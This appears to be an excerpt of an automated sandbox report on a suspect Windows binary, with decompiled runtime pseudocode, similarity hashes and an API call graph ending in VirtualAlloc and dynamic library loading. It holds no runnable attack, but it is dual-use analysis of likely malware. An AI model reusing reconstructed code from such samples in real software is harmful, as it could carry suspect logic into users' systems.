                                                            • __getptd.LIBCMT ref: 00408E9C
                                                              • Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
                                                              • Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400
                                                            • __getptd.LIBCMT ref: 00408EB3
                                                            • __amsg_exit.LIBCMT ref: 00408EC1
                                                            • __lock.LIBCMT ref: 00408ED1
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                            • String ID:
                                                            • API String ID: 3521780317-0
                                                            • Opcode ID: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
                                                            • Instruction ID: 7dfb229ca309a3576c6494551f69a8709b23ae4e697a609cd87e5ec77ce5a6c7
                                                            • Opcode Fuzzy Hash: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
                                                            • Instruction Fuzzy Hash: E1F090329107408AD720BB6AD502B4E73A0AB40729F11853FE985B72D3CF7CAA019BDD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004044E9() {
                                                            				intOrPtr _t5;
                                                            				intOrPtr _t6;
                                                            				intOrPtr _t10;
                                                            				void* _t12;
                                                            				intOrPtr _t15;
                                                            				intOrPtr* _t16;
                                                            				signed int _t19;
                                                            				signed int _t20;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t27;
                                                            
                                                            				_t5 =  *0x42f4e0;
                                                            				_t26 = 0x14;
                                                            				if(_t5 != 0) {
                                                            					if(_t5 < _t26) {
                                                            						_t5 = _t26;
                                                            						goto L4;
                                                            					}
                                                            				} else {
                                                            					_t5 = 0x200;
                                                            					L4:
                                                            					 *0x42f4e0 = _t5;
                                                            				}
                                                            				_t6 = E0040810E(_t5, 4);
                                                            				 *0x42e4c4 = _t6;
                                                            				if(_t6 != 0) {
                                                            					L8:
                                                            					_t19 = 0;
                                                            					_t15 = 0x411220;
                                                            					while(1) {
                                                            						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                            						_t15 = _t15 + 0x20;
                                                            						_t19 = _t19 + 4;
                                                            						if(_t15 >= 0x4114a0) {
                                                            							break;
                                                            						}
                                                            						_t6 =  *0x42e4c4;
                                                            					}
                                                            					_t27 = 0xfffffffe;
                                                            					_t20 = 0;
                                                            					_t16 = 0x411230;
                                                            					do {
                                                            						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x42e3c0 + (_t20 >> 5) * 4))));
                                                            						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                            							 *_t16 = _t27;
                                                            						}
                                                            						_t16 = _t16 + 0x20;
                                                            						_t20 = _t20 + 1;
                                                            					} while (_t16 < 0x411290);
                                                            					return 0;
                                                            				} else {
                                                            					 *0x42f4e0 = _t26;
                                                            					_t6 = E0040810E(_t26, 4);
                                                            					 *0x42e4c4 = _t6;
                                                            					if(_t6 != 0) {
                                                            						goto L8;
                                                            					} else {
                                                            						_t12 = 0x1a;
                                                            						return _t12;
                                                            					}
                                                            				}
                                                            			}













                                                            0x004044e9
                                                            0x004044f1
                                                            0x004044f4
                                                            0x004044ff
                                                            0x00404501
                                                            0x00000000
                                                            0x00404501
                                                            0x004044f6
                                                            0x004044f6
                                                            0x00404503
                                                            0x00404503
                                                            0x00404503
                                                            0x0040450b
                                                            0x00404512
                                                            0x00404519
                                                            0x00404539
                                                            0x00404539
                                                            0x0040453b
                                                            0x00404547
                                                            0x00404547
                                                            0x0040454a
                                                            0x0040454d
                                                            0x00404556
                                                            0x00000000
                                                            0x00000000
                                                            0x00404542
                                                            0x00404542
                                                            0x0040455a
                                                            0x0040455b
                                                            0x0040455d
                                                            0x00404563
                                                            0x00404577
                                                            0x0040457d
                                                            0x00404587
                                                            0x00404587
                                                            0x00404589
                                                            0x0040458c
                                                            0x0040458d
                                                            0x00404599
                                                            0x0040451b
                                                            0x0040451e
                                                            0x00404524
                                                            0x0040452b
                                                            0x00404532
                                                            0x00000000
                                                            0x00404534
                                                            0x00404536
                                                            0x00404538
                                                            0x00404538
                                                            0x00404532

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: B
                                                            • API String ID: 3494438863-3806887055
                                                            • Opcode ID: cec946d9292b1583b33420cc846faf8f2b07d7b3b51fbce41faad93c074d4dda
                                                            • Instruction ID: ec396d00c2cb3653196f90cd37ad9fe5819471fdf8d43a4571e337af32097bf8
                                                            • Opcode Fuzzy Hash: cec946d9292b1583b33420cc846faf8f2b07d7b3b51fbce41faad93c074d4dda
                                                            • Instruction Fuzzy Hash: C811E7F130412067E7249F1FBD406662295ABD47787A4057FFB15EB3E0D778D882464C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:3.1%
                                                            Dynamic/Decrypted Code Coverage:15.1%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:1609
                                                            Total number of Limit Nodes:23
                                                            execution_graph 7249 4040c0 7250 4040db 7249->7250 7253 40418a 7250->7253 7254 4040ec 7253->7254 7255 404193 7253->7255 7255->7254 7257 4074c6 7255->7257 7258 407503 __handle_exc 7257->7258 7259 407526 __87except __ctrlfp 7258->7259 7265 40ad84 7258->7265 7262 4075f1 7259->7262 7268 40af89 7259->7268 7263 405ec0 ___mtold12 5 API calls 7262->7263 7264 4075fe 7263->7264 7264->7254 7275 40aaa8 7265->7275 7267 40ada2 7267->7259 7269 40af94 7268->7269 7270 40afa9 7268->7270 7272 40afae 7269->7272 7273 404382 __lseeki64_nolock 68 API calls 7269->7273 7271 404382 __lseeki64_nolock 68 API calls 7270->7271 7271->7272 7272->7262 7274 40afa1 7273->7274 7274->7262 7276 40aacf __raise_exc_ex 7275->7276 7277 40acc2 RaiseException 7276->7277 7278 40acdb 7277->7278 7278->7267 7279 40cac0 RtlUnwind 6033 403e81 6079 40487c 6033->6079 6035 403e8d GetStartupInfoW 6037 403eb0 6035->6037 6080 407400 HeapCreate 6037->6080 6039 403f00 6141 406539 GetModuleHandleW 6039->6141 6042 403f06 6043 403f0a 6042->6043 6045 403f12 __RTC_Initialize 6042->6045 6044 403e58 _fast_error_exit 68 API calls 6043->6044 6046 403f11 6044->6046 6082 4071ac 6045->6082 6046->6045 6048 403f1f 6049 403f23 6048->6049 6050 403f2b GetCommandLineW 6048->6050 6174 403b50 6049->6174 6097 40714f GetEnvironmentStringsW 6050->6097 6054 403f3a 6181 4070a1 GetModuleFileNameW 6054->6181 6056 403f44 6057 403f50 6056->6057 6058 403f48 6056->6058 6103 406e72 6057->6103 6059 403b50 __amsg_exit 68 API calls 6058->6059 6062 403f4f 6059->6062 6062->6057 6063 403f61 6116 403c0f 6063->6116 6064 403f59 6065 403b50 __amsg_exit 68 API calls 6064->6065 6067 403f60 6065->6067 6067->6063 6068 403f67 6069 403f6c 6068->6069 6072 403f73 __wwincmdln 6068->6072 6070 403b50 __amsg_exit 68 API calls 6069->6070 6071 403f72 6070->6071 6071->6072 6072->6071 6122 402adc 6072->6122 6075 403fa1 6188 403dec 6075->6188 6078 403fa6 __commit 6079->6035 6081 403ef4 6080->6081 6081->6039 6133 403e58 6081->6133 6191 40487c 6082->6191 6084 4071b8 GetStartupInfoA 6192 40810e 6084->6192 6086 4071d9 6087 4073f7 __commit 6086->6087 6089 40810e __calloc_crt 68 API calls 6086->6089 6092 4072c1 6086->6092 6096 40733e 6086->6096 6087->6048 6088 407374 GetStdHandle 6088->6096 6089->6086 6090 4073d9 SetHandleCount 6090->6087 6091 407386 GetFileType 6091->6096 6092->6087 6093 4072ea GetFileType 6092->6093 6092->6096 6198 406d45 6092->6198 6093->6092 6094 406d45 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6094->6096 6096->6087 6096->6088 6096->6090 6096->6091 6096->6094 6098 407160 6097->6098 6099 407164 6097->6099 6098->6054 6100 4080c9 __malloc_crt 68 API calls 6099->6100 6101 407185 _realloc 6100->6101 6102 40718c FreeEnvironmentStringsW 6101->6102 6102->6054 6104 406e8a _wcslen 6103->6104 6108 403f55 6103->6108 6105 40810e __calloc_crt 68 API calls 6104->6105 6111 406eae _wcslen 6105->6111 6106 406f13 6107 4081a8 __wsetenvp 68 API calls 6106->6107 6107->6108 6108->6063 6108->6064 6109 40810e __calloc_crt 68 API calls 6109->6111 6110 406f39 6112 4081a8 __wsetenvp 68 API calls 6110->6112 6111->6106 6111->6108 6111->6109 6111->6110 6114 406ef8 6111->6114 6561 40aa1f 6111->6561 6112->6108 6114->6111 6115 40472e __invoke_watson 10 API calls 6114->6115 6115->6114 6117 403c1d __IsNonwritableInCurrentImage 6116->6117 6570 4069ff 6117->6570 6119 403c3b __initterm_e 6121 403c5a __IsNonwritableInCurrentImage __initterm 6119->6121 6574 40699c 6119->6574 6121->6068 6123 402aef 6 API calls 6122->6123 6128 402b39 6122->6128 6674 403954 6123->6674 6125 402b3b SetCommMask SetLastError GetConsoleAliasW 6125->6128 6127 403908 6681 40297f 6127->6681 6128->6125 6128->6127 6129 403954 _calloc 68 API calls 6131 402b29 6129->6131 6131->6128 6132 403921 6132->6075 6185 403dc0 6132->6185 6134 403e66 6133->6134 6135 403e6b 6133->6135 6136 405e87 __FF_MSGBANNER 68 API calls 6134->6136 6137 405cdc __NMSG_WRITE 68 API calls 6135->6137 6136->6135 6138 403e73 6137->6138 6139 403ba4 _malloc 3 API calls 6138->6139 6140 403e7d 6139->6140 6140->6039 6142 406553 6141->6142 6143 40654d 6141->6143 6145 4066bc 6142->6145 6146 40655e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6142->6146 6144 403b20 __crt_waiting_on_module_handle 2 API calls 6143->6144 6144->6142 7032 406253 6145->7032 6151 4065a7 TlsAlloc 6146->6151 6149 4065f5 TlsSetValue 6150 4066c1 6149->6150 6152 406606 6149->6152 6150->6042 6151->6149 6151->6150 7021 403e0a 6152->7021 6155 406129 __encode_pointer 7 API calls 6156 406616 6155->6156 6157 406129 __encode_pointer 7 API calls 6156->6157 6158 406626 6157->6158 6159 406129 __encode_pointer 7 API calls 6158->6159 6160 406636 6159->6160 6161 406129 __encode_pointer 7 API calls 6160->6161 6162 406646 6161->6162 7028 4066c6 6162->7028 6165 4061a4 __decode_pointer 6 API calls 6166 406667 6165->6166 6166->6145 6167 40810e __calloc_crt 68 API calls 6166->6167 6168 406680 6167->6168 6168->6145 6169 4061a4 __decode_pointer 6 API calls 6168->6169 6170 40669a 6169->6170 6170->6145 6171 4066a1 6170->6171 6172 406290 __getptd_noexit 68 API calls 6171->6172 6173 4066a9 GetCurrentThreadId 6172->6173 6173->6150 6175 405e87 __FF_MSGBANNER 68 API calls 6174->6175 6176 403b5a 6175->6176 6177 405cdc __NMSG_WRITE 68 API calls 6176->6177 6178 403b62 6177->6178 6179 4061a4 __decode_pointer 6 API calls 6178->6179 6180 403b6d 6179->6180 6180->6050 6182 4070d6 _wparse_cmdline 6181->6182 6183 4080c9 __malloc_crt 68 API calls 6182->6183 6184 407119 _wparse_cmdline 6182->6184 6183->6184 6184->6056 7046 403c94 6185->7046 6187 403dd1 6187->6075 6189 403c94 _doexit 68 API calls 6188->6189 6190 403df7 6189->6190 6190->6078 6191->6084 6193 408117 6192->6193 6195 408154 6193->6195 6196 408135 Sleep 6193->6196 6202 4043cb 6193->6202 6195->6086 6197 40814a 6196->6197 6197->6193 6197->6195 6560 40487c 6198->6560 6200 406d51 InitializeCriticalSectionAndSpinCount 6201 406d95 __commit 6200->6201 6201->6092 6203 4043d7 __commit 6202->6203 6204 4043ef 6203->6204 6214 40440e _memset 6203->6214 6215 404382 6204->6215 6207 404480 RtlAllocateHeap 6207->6214 6211 404404 __commit 6211->6193 6214->6207 6214->6211 6221 406842 6214->6221 6228 407de4 6214->6228 6234 4044c7 6214->6234 6237 406db4 6214->6237 6240 406377 GetLastError 6215->6240 6217 404387 6218 404856 6217->6218 6219 4061a4 __decode_pointer 6 API calls 6218->6219 6220 404866 __invoke_watson 6219->6220 6222 406857 6221->6222 6223 40686a EnterCriticalSection 6221->6223 6340 40677f 6222->6340 6223->6214 6225 40685d 6225->6223 6226 403b50 __amsg_exit 67 API calls 6225->6226 6227 406869 6226->6227 6227->6223 6230 407e12 6228->6230 6229 407eab 6232 407eb4 6229->6232 6555 4079fb 6229->6555 6230->6229 6230->6232 6548 40794b 6230->6548 6232->6214 6559 406768 LeaveCriticalSection 6234->6559 6236 4044ce 6236->6214 6238 4061a4 __decode_pointer 6 API calls 6237->6238 6239 406dc4 6238->6239 6239->6214 6254 40621f TlsGetValue 6240->6254 6243 4063e4 SetLastError 6243->6217 6244 40810e __calloc_crt 65 API calls 6245 4063a2 6244->6245 6245->6243 6259 4061a4 TlsGetValue 6245->6259 6248 4063c3 6269 406290 6248->6269 6249 4063db 6287 4081a8 6249->6287 6252 4063e1 6252->6243 6253 4063cb GetCurrentThreadId 6253->6243 6255 406234 6254->6255 6256 40624f 6254->6256 6257 4061a4 __decode_pointer 6 API calls 6255->6257 6256->6243 6256->6244 6258 40623f TlsSetValue 6257->6258 6258->6256 6260 4061bc 6259->6260 6261 4061dd GetModuleHandleW 6259->6261 6260->6261 6262 4061c6 TlsGetValue 6260->6262 6263 4061f8 GetProcAddress 6261->6263 6264 4061ed 6261->6264 6267 4061d1 6262->6267 6266 4061d5 6263->6266 6300 403b20 6264->6300 6266->6248 6266->6249 6267->6261 6267->6266 6304 40487c 6269->6304 6271 40629c GetModuleHandleW 6272 4062b2 6271->6272 6273 4062ac 6271->6273 6274 4062ca GetProcAddress GetProcAddress 6272->6274 6275 4062ee 6272->6275 6276 403b20 __crt_waiting_on_module_handle 2 API calls 6273->6276 6274->6275 6277 406842 __lock 64 API calls 6275->6277 6276->6272 6278 40630d InterlockedIncrement 6277->6278 6305 406365 6278->6305 6281 406842 __lock 64 API calls 6282 40632e 6281->6282 6308 408d2a InterlockedIncrement 6282->6308 6284 40634c 6320 40636e 6284->6320 6286 406359 __commit 6286->6253 6288 4081b4 __commit 6287->6288 6289 4081f3 6288->6289 6291 406842 __lock 66 API calls 6288->6291 6292 40822d __commit _realloc 6288->6292 6290 408208 HeapFree 6289->6290 6289->6292 6290->6292 6293 40821a 6290->6293 6296 4081cb ___sbh_find_block 6291->6296 6292->6252 6294 404382 __lseeki64_nolock 66 API calls 6293->6294 6295 40821f GetLastError 6294->6295 6295->6292 6299 4081e5 6296->6299 6325 407635 6296->6325 6332 4081fe 6299->6332 6301 403b2b Sleep GetModuleHandleW 6300->6301 6302 403b49 6301->6302 6303 403b4d 6301->6303 6302->6301 6302->6303 6303->6263 6303->6266 6304->6271 6323 406768 LeaveCriticalSection 6305->6323 6307 406327 6307->6281 6309 408d48 InterlockedIncrement 6308->6309 6310 408d4b 6308->6310 6309->6310 6311 408d55 InterlockedIncrement 6310->6311 6312 408d58 6310->6312 6311->6312 6313 408d62 InterlockedIncrement 6312->6313 6314 408d65 6312->6314 6313->6314 6315 408d6f InterlockedIncrement 6314->6315 6317 408d72 6314->6317 6315->6317 6316 408d8b InterlockedIncrement 6316->6317 6317->6316 6318 408d9b InterlockedIncrement 6317->6318 6319 408da6 InterlockedIncrement 6317->6319 6318->6317 6319->6284 6324 406768 LeaveCriticalSection 6320->6324 6322 406375 6322->6286 6323->6307 6324->6322 6326 407674 6325->6326 6331 407916 6325->6331 6327 407860 VirtualFree 6326->6327 6326->6331 6328 4078c4 6327->6328 6329 4078d3 VirtualFree HeapFree 6328->6329 6328->6331 6335 40b0d0 6329->6335 6331->6299 6339 406768 LeaveCriticalSection 6332->6339 6334 408205 6334->6289 6336 40b0e8 6335->6336 6337 40b117 6336->6337 6338 40b10f __VEC_memcpy 6336->6338 6337->6331 6338->6337 6339->6334 6341 40678b __commit 6340->6341 6342 4067b1 6341->6342 6366 405e87 6341->6366 6350 4067c1 __commit 6342->6350 6412 4080c9 6342->6412 6348 4067e2 6353 406842 __lock 68 API calls 6348->6353 6349 4067d3 6352 404382 __lseeki64_nolock 68 API calls 6349->6352 6350->6225 6352->6350 6355 4067e9 6353->6355 6356 4067f1 6355->6356 6357 40681d 6355->6357 6359 406d45 ___lock_fhandle InitializeCriticalSectionAndSpinCount 6356->6359 6358 4081a8 __wsetenvp 68 API calls 6357->6358 6360 40680e 6358->6360 6361 4067fc 6359->6361 6418 406839 6360->6418 6361->6360 6363 4081a8 __wsetenvp 68 API calls 6361->6363 6364 406808 6363->6364 6365 404382 __lseeki64_nolock 68 API calls 6364->6365 6365->6360 6421 40a68f 6366->6421 6369 405e9b 6370 405cdc __NMSG_WRITE 68 API calls 6369->6370 6373 405ebd 6369->6373 6372 405eb3 6370->6372 6371 40a68f __set_error_mode 68 API calls 6371->6369 6374 405cdc __NMSG_WRITE 68 API calls 6372->6374 6375 405cdc 6373->6375 6374->6373 6376 405cf0 6375->6376 6377 405e4b 6376->6377 6378 40a68f __set_error_mode 65 API calls 6376->6378 6409 403ba4 6377->6409 6379 405d12 6378->6379 6380 405e50 GetStdHandle 6379->6380 6382 40a68f __set_error_mode 65 API calls 6379->6382 6380->6377 6381 405e5e _strlen 6380->6381 6381->6377 6385 405e77 WriteFile 6381->6385 6383 405d23 6382->6383 6383->6380 6384 405d35 6383->6384 6384->6377 6427 40a627 6384->6427 6385->6377 6388 405d6b GetModuleFileNameA 6389 405d89 6388->6389 6395 405dac _strlen 6388->6395 6392 40a627 _strcpy_s 65 API calls 6389->6392 6393 405d99 6392->6393 6393->6395 6396 40472e __invoke_watson 10 API calls 6393->6396 6394 405def 6452 40a4fe 6394->6452 6395->6394 6443 40a572 6395->6443 6396->6395 6400 405e13 6403 40a4fe _strcat_s 65 API calls 6400->6403 6402 40472e __invoke_watson 10 API calls 6402->6400 6405 405e27 6403->6405 6404 40472e __invoke_watson 10 API calls 6404->6394 6406 405e38 6405->6406 6408 40472e __invoke_watson 10 API calls 6405->6408 6461 40a395 6406->6461 6408->6406 6514 403b79 GetModuleHandleW 6409->6514 6414 4080d2 6412->6414 6415 4067cc 6414->6415 6416 4080e9 Sleep 6414->6416 6517 40b484 6414->6517 6415->6348 6415->6349 6417 4080fe 6416->6417 6417->6414 6417->6415 6547 406768 LeaveCriticalSection 6418->6547 6420 406840 6420->6350 6422 40a69e 6421->6422 6423 405e8e 6422->6423 6424 404382 __lseeki64_nolock 68 API calls 6422->6424 6423->6369 6423->6371 6425 40a6c1 6424->6425 6426 404856 __commit 6 API calls 6425->6426 6426->6423 6428 40a638 6427->6428 6429 40a63f 6427->6429 6428->6429 6434 40a665 6428->6434 6430 404382 __lseeki64_nolock 68 API calls 6429->6430 6431 40a644 6430->6431 6432 404856 __commit 6 API calls 6431->6432 6433 405d57 6432->6433 6433->6388 6436 40472e 6433->6436 6434->6433 6435 404382 __lseeki64_nolock 68 API calls 6434->6435 6435->6431 6488 405a50 6436->6488 6438 40475b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6439 404837 GetCurrentProcess TerminateProcess 6438->6439 6441 40482b __invoke_watson 6438->6441 6490 405ec0 6439->6490 6441->6439 6442 404854 6442->6388 6447 40a584 6443->6447 6444 40a588 6445 405ddc 6444->6445 6446 404382 __lseeki64_nolock 68 API calls 6444->6446 6445->6394 6445->6404 6448 40a5a4 6446->6448 6447->6444 6447->6445 6450 40a5ce 6447->6450 6449 404856 __commit 6 API calls 6448->6449 6449->6445 6450->6445 6451 404382 __lseeki64_nolock 68 API calls 6450->6451 6451->6448 6453 40a516 6452->6453 6456 40a50f 6452->6456 6454 404382 __lseeki64_nolock 68 API calls 6453->6454 6455 40a51b 6454->6455 6457 404856 __commit 6 API calls 6455->6457 6456->6453 6459 40a54a 6456->6459 6458 405e02 6457->6458 6458->6400 6458->6402 6459->6458 6460 404382 __lseeki64_nolock 68 API calls 6459->6460 6460->6455 6499 40619b 6461->6499 6464 40a3b8 LoadLibraryA 6465 40a3cd GetProcAddress 6464->6465 6478 40a4e2 6464->6478 6467 40a3e3 6465->6467 6465->6478 6466 40a440 6470 4061a4 __decode_pointer 6 API calls 6466->6470 6483 40a46a 6466->6483 6502 406129 TlsGetValue 6467->6502 6468 4061a4 __decode_pointer 6 API calls 6468->6478 6469 4061a4 __decode_pointer 6 API calls 6479 40a4ad 6469->6479 6472 40a45d 6470->6472 6474 4061a4 __decode_pointer 6 API calls 6472->6474 6474->6483 6475 406129 __encode_pointer 7 API calls 6476 40a3fe GetProcAddress 6475->6476 6477 406129 __encode_pointer 7 API calls 6476->6477 6480 40a413 GetProcAddress 6477->6480 6478->6377 6482 4061a4 __decode_pointer 6 API calls 6479->6482 6485 40a495 6479->6485 6481 406129 __encode_pointer 7 API calls 6480->6481 6484 40a428 6481->6484 6482->6485 6483->6469 6483->6485 6484->6466 6486 40a432 GetProcAddress 6484->6486 6485->6468 6487 406129 __encode_pointer 7 API calls 6486->6487 6487->6466 6489 405a5c __VEC_memzero 6488->6489 6489->6438 6491 405ec8 6490->6491 6492 405eca IsDebuggerPresent 6490->6492 6491->6442 6498 4091b5 6492->6498 6495 40a7a7 SetUnhandledExceptionFilter UnhandledExceptionFilter 6496 40a7c4 __invoke_watson 6495->6496 6497 40a7cc GetCurrentProcess TerminateProcess 6495->6497 6496->6497 6497->6442 6498->6495 6500 406129 __encode_pointer 7 API calls 6499->6500 6501 4061a2 6500->6501 6501->6464 6501->6466 6503 406141 6502->6503 6504 406162 GetModuleHandleW 6502->6504 6503->6504 6505 40614b TlsGetValue 6503->6505 6506 406172 6504->6506 6507 40617d GetProcAddress 6504->6507 6510 406156 6505->6510 6508 403b20 __crt_waiting_on_module_handle 2 API calls 6506->6508 6509 40615a 6507->6509 6511 406178 6508->6511 6512 406195 GetProcAddress 6509->6512 6513 40618d RtlEncodePointer 6509->6513 6510->6504 6510->6509 6511->6507 6511->6512 6512->6475 6513->6512 6515 403b9d ExitProcess 6514->6515 6516 403b8d GetProcAddress 6514->6516 6516->6515 6518 40b537 6517->6518 6527 40b496 6517->6527 6519 406db4 _malloc 6 API calls 6518->6519 6520 40b53d 6519->6520 6522 404382 __lseeki64_nolock 67 API calls 6520->6522 6521 405e87 __FF_MSGBANNER 67 API calls 6526 40b4a7 6521->6526 6534 40b52f 6522->6534 6523 405cdc __NMSG_WRITE 67 API calls 6523->6526 6525 40b4f3 RtlAllocateHeap 6525->6527 6526->6521 6526->6523 6526->6527 6528 403ba4 _malloc 3 API calls 6526->6528 6527->6525 6527->6526 6529 40b523 6527->6529 6530 406db4 _malloc 6 API calls 6527->6530 6532 40b528 6527->6532 6527->6534 6535 40b435 6527->6535 6528->6526 6531 404382 __lseeki64_nolock 67 API calls 6529->6531 6530->6527 6531->6532 6533 404382 __lseeki64_nolock 67 API calls 6532->6533 6533->6534 6534->6414 6536 40b441 __commit 6535->6536 6537 406842 __lock 68 API calls 6536->6537 6539 40b472 __commit 6536->6539 6538 40b457 6537->6538 6540 407de4 ___sbh_alloc_block 5 API calls 6538->6540 6539->6527 6541 40b462 6540->6541 6543 40b47b 6541->6543 6546 406768 LeaveCriticalSection 6543->6546 6545 40b482 6545->6539 6546->6545 6547->6420 6549 407992 HeapAlloc 6548->6549 6550 40795e HeapReAlloc 6548->6550 6552 40797c 6549->6552 6553 4079b5 VirtualAlloc 6549->6553 6551 407980 6550->6551 6550->6552 6551->6549 6552->6229 6553->6552 6554 4079cf HeapFree 6553->6554 6554->6552 6556 407a12 VirtualAlloc 6555->6556 6558 407a59 6556->6558 6558->6232 6559->6236 6560->6200 6562 40aa30 6561->6562 6563 40aa37 6561->6563 6562->6563 6568 40aa63 6562->6568 6564 404382 __lseeki64_nolock 68 API calls 6563->6564 6565 40aa3c 6564->6565 6566 404856 __commit 6 API calls 6565->6566 6567 40aa4b 6566->6567 6567->6111 6568->6567 6569 404382 __lseeki64_nolock 68 API calls 6568->6569 6569->6565 6571 406a05 6570->6571 6572 406129 __encode_pointer 7 API calls 6571->6572 6573 406a1d 6571->6573 6572->6571 6573->6119 6577 406960 6574->6577 6576 4069a9 6576->6121 6578 40696c __commit 6577->6578 6585 403bbc 6578->6585 6584 40698d __commit 6584->6576 6586 406842 __lock 68 API calls 6585->6586 6587 403bc3 6586->6587 6588 406875 6587->6588 6589 4061a4 __decode_pointer 6 API calls 6588->6589 6590 406889 6589->6590 6591 4061a4 __decode_pointer 6 API calls 6590->6591 6592 406899 6591->6592 6593 40691c 6592->6593 6608 40a8d4 6592->6608 6605 406996 6593->6605 6595 406903 6596 406129 __encode_pointer 7 API calls 6595->6596 6597 406911 6596->6597 6601 406129 __encode_pointer 7 API calls 6597->6601 6598 4068db 6598->6593 6602 40815a __realloc_crt 74 API calls 6598->6602 6603 4068f1 6598->6603 6599 4068b7 6599->6595 6599->6598 6621 40815a 6599->6621 6601->6593 6602->6603 6603->6593 6604 406129 __encode_pointer 7 API calls 6603->6604 6604->6595 6670 403bc5 6605->6670 6609 40a8e0 __commit 6608->6609 6610 40a8f0 6609->6610 6611 40a90d 6609->6611 6612 404382 __lseeki64_nolock 68 API calls 6610->6612 6613 40a94e HeapSize 6611->6613 6615 406842 __lock 68 API calls 6611->6615 6614 40a8f5 6612->6614 6617 40a905 __commit 6613->6617 6616 404856 __commit 6 API calls 6614->6616 6618 40a91d ___sbh_find_block 6615->6618 6616->6617 6617->6599 6626 40a96e 6618->6626 6625 408163 6621->6625 6623 4081a2 6623->6598 6624 408183 Sleep 6624->6625 6625->6623 6625->6624 6630 40b54e 6625->6630 6629 406768 LeaveCriticalSection 6626->6629 6628 40a949 6628->6613 6628->6617 6629->6628 6631 40b55a __commit 6630->6631 6632 40b561 6631->6632 6633 40b56f 6631->6633 6634 40b484 _malloc 68 API calls 6632->6634 6635 40b582 6633->6635 6636 40b576 6633->6636 6652 40b569 __commit _realloc 6634->6652 6643 40b6f4 6635->6643 6663 40b58f ___sbh_resize_block _realloc ___sbh_find_block 6635->6663 6637 4081a8 __wsetenvp 68 API calls 6636->6637 6637->6652 6638 40b727 6639 406db4 _malloc 6 API calls 6638->6639 6642 40b72d 6639->6642 6640 406842 __lock 68 API calls 6640->6663 6641 40b6f9 HeapReAlloc 6641->6643 6641->6652 6644 404382 __lseeki64_nolock 68 API calls 6642->6644 6643->6638 6643->6641 6645 40b74b 6643->6645 6646 406db4 _malloc 6 API calls 6643->6646 6649 40b741 6643->6649 6644->6652 6647 404382 __lseeki64_nolock 68 API calls 6645->6647 6645->6652 6646->6643 6650 40b754 GetLastError 6647->6650 6651 404382 __lseeki64_nolock 68 API calls 6649->6651 6650->6652 6654 40b6c2 6651->6654 6652->6625 6653 40b61a HeapAlloc 6653->6663 6654->6652 6656 40b6c7 GetLastError 6654->6656 6655 40b66f HeapReAlloc 6655->6663 6656->6652 6657 407de4 ___sbh_alloc_block 5 API calls 6657->6663 6658 40b6da 6658->6652 6660 404382 __lseeki64_nolock 68 API calls 6658->6660 6659 406db4 _malloc 6 API calls 6659->6663 6661 40b6e7 6660->6661 6661->6650 6661->6652 6662 40b6bd 6664 404382 __lseeki64_nolock 68 API calls 6662->6664 6663->6638 6663->6640 6663->6652 6663->6653 6663->6655 6663->6657 6663->6658 6663->6659 6663->6662 6665 407635 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 6663->6665 6666 40b692 6663->6666 6664->6654 6665->6663 6669 406768 LeaveCriticalSection 6666->6669 6668 40b699 6668->6663 6669->6668 6673 406768 LeaveCriticalSection 6670->6673 6672 403bcc 6672->6584 6673->6672 6675 4043cb __calloc_impl 68 API calls 6674->6675 6676 40396e 6675->6676 6677 402b22 6676->6677 6678 404382 __lseeki64_nolock 68 API calls 6676->6678 6677->6129 6679 403981 6678->6679 6679->6677 6680 404382 __lseeki64_nolock 68 API calls 6679->6680 6680->6677 6682 402996 6681->6682 6683 4029ae GetModuleHandleA GetProcAddress 6681->6683 6699 403b0a 6682->6699 6685 4029e4 6683->6685 6702 4028be LoadLibraryA GetProcAddress 6685->6702 6686 40299e 6688 403dc0 68 API calls 6686->6688 6688->6683 6689 4029ee 6690 402a1f GetCurrentThreadId VirtualAlloc ReadConsoleA 6689->6690 